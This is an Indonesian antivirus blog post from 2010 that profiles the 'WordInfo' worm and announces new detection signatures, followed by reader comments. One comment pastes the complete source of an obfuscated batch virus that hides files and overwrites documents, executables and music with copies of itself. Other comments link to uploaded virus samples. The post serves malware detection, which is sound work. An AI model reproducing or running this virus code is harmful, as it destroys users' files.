MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Waspadai Virus WordInfo! (Download Database Morphost November 2010)

Posted by Morphic pada November 9, 2010


Setelah vakum beberapa lama, akhirnya analisis virus MorphostLab kembali lagi. Tentunya bersamaan dengan rilisnya database bulan November 2010.
Nah, untuk hasil analisis kali ini, kami sengaja memilih worm “WordInfo” (nama menurut MorphostLab).

Ciri fisik Malware:
-Nama Malware: WordInfo
-Ukuran: 132 KB (135,168 bytes)
-Icon: Microsoft Word 98
-InternalName: Win32App402c
-Company: 128 KB

Berdasar analisis saya, worm ini mendrop duplikasi filenya di:
-C:\MSystem.com
-C:\WINDOWS\Installer\Installer.com
-C:\WINDOWS\System32\PChealth.com
-[Drive]:\rootInfo.exe
(catatan: anggap drive C sebagai system)

Worm ini juga menghidden file:
-C:\Windows\regedit.exe
-C:\Windows\System32\regedt32.exe

Diduga worm ini menyebarkan file duplikasinya ke dalam setiap folder dengan filename yang sama dengan nama folder serta penambahan nama “Info” dibelakangnya…
Misal di dalam folder “Morphost” ada worm ini dengan filename “Morphost Info.exe”

Tidak ada hal yang signifikan dari worm ini sebenarnya…

Akan tetapi, jika anda merasa komputer anda telah terinfeksi worm ini tidak ada salahnya untuk mencoba Morphost Antivirus Lokal.

Malware-malware yang ditambahkan antara lain:
Adult
Anti-Icon
Disentry
Fake-McAfee
Fake-Winamp
File Deleter
Ghost-1
Microjoin
MouseDisable
NS-1
NS-2
NS-3
NS-4
NS-5
NS-6
NS-7
Playboy-C
Qvod
RS.Module
Sabotage-HE
Virus-014
WinAV
WordInfo
Worm.VB-5

Silakan download. Semoga dengan database terbaru ini, komputer anda dan laptop anda semakin terjaga.
Terima kasih.

Download Database Morphost November 2010

25 Tanggapan to “Waspadai Virus WordInfo! (Download Database Morphost November 2010)”

  1. made said

    Plus Features pakenya gimana sih?

  2. Neo BeKaBe said

    Virus datang: http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/590/
    (http://www.ziddu.com/download/12757145/upload-awnq-virus_bkb.zip.html)

  3. Satryacode said

    Pertamaxxxxx……

  4. Akhmad Efendi said

    @echo off
    rem c0d3d by Vires @ palu city
    rem If u wanna know how this worx
    rem don’t follow the code from top to bottom
    rem but follow the flow of code
    rem is it beautiful???yes it is!!!!
    rem vires18[at]yahoo[dot]com
    rem (c)2007,Indonesia
    rem Dedicated to my Girl:eltietien(did u knew her b 4???)
    rem Greetz to all my friends
    rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
    rem xniffer, miyabi ,the_simpson,psycopath & all i forget
    rem sorry!!!!!
    goto v781i21r1212e23s4c5o677o85l
    :n56a19m75a0101011
    %res%%c00l% %gal%* %gal%bat
    %l% pulangpalu
    :t45e18g14a11l
    %zhe% x=exe
    %zhe% c=com
    %zhe% fah=py
    %l% v25i85r19e0s
    :l08a80t19i85f08a19h
    %zhe% sya=att
    %zhe% gal=*.
    %zhe% vi=fo
    %sya%%res%%ah% %gal%* %s%
    %zhe% ti=co
    %l% t45e18g14a11l
    :v25i85r19e0s
    %zhe% d=txt
    %zhe% la=do
    %zhe% m=doc
    %vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
    %l% n56a19m75a0101011
    :v18i17r16e15s
    %zhe% s=-%vi%s -%vi%r -%vi%h
    %zhe% res=r
    %zhe% c00l=en
    %l% l08a80t19i85f08a19h
    :v781i21r1212e23s4c5o677o85l
    set zhe=set
    %zhe% te=in
    %zhe% l=goto
    %zhe% ah=ib
    %zhe% lgu=mp3
    %l% v18i17r16e15s
    palucity
    rem Heh,BATCH STILL BEAUTIFUL RIGHT????
    rem (c)vires
    =====
    Mas Morphic, tolong teliti kode ini ya,, isi flashdiskq jadi .bat semua,,, mohon bantuannya

    • Maxx said

      klo nggak salah ini virus dulu, namanya Rawut. Punya anak tegal ato lampung ya? Gw lupa juga. Hmm…kemaren sih sempet utak atik virus ini. Memang nggak ada AV lokal yang deteksi file yg satu ini. Efeknya apa aja Akhmad Efendi??

  5. Akhmad Efendi said

    q abiz upload virus baru ney buat Morphost,,
    Maju tyuz buat Morphost….. ^^

    http://www.4shared.com/file/DZrMSLNu/Virus_ShellHoleShortcutA__B_by.html

  6. hasmi31 said

    makin jaya az ya phic

    jadi kangen ne ama dunia virus indonesia

    hehehehe

  7. junaidi said

    trim database morphost november 2010 n mo nanya gan q ketemu dengan virus ninja bisa di ditek tp gak bisa dihapus

  8. Maxx said

    Phic, gimana cara ngilangin virus Viking?? waktu itu av mu mendeteksi ada virus itu di komp temen gw….

  9. ipin Jr. said

    mas, koq ngupdate susah sih… saya mau update database, tapi setelah berhasil 100%, koq dia ngupdate lagi… dan begitu terus smp2 autodetect-nya not responding??? salah apanya y????
    thanks!

  10. Zeus said

    Mas, saya kn pake morphost versi 8 n dah update melalui antivirus nya langsung, apakah database ini sudah termasuk ke database online tsb?

  11. Dyn said

    wah data basenya makin lengkap nih…

  12. Akhmad Efendi said

    Sedot dulu ahh,,,,,,,,,,,
    Makasih Mas Morphic,,

  13. Damar said

    ke-4 :, thx bang….,

  14. segera menuju lokasi bang, thang untuk updatnya

  15. Kevin Jelmaan said

    Ketigaxxx

  16. kriztna raditya said

    keduaxxx !
    langsung sedot deh……….

  17. […] Waspadai Virus WordInfo! (Download Database Morphost November 2010) […]

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: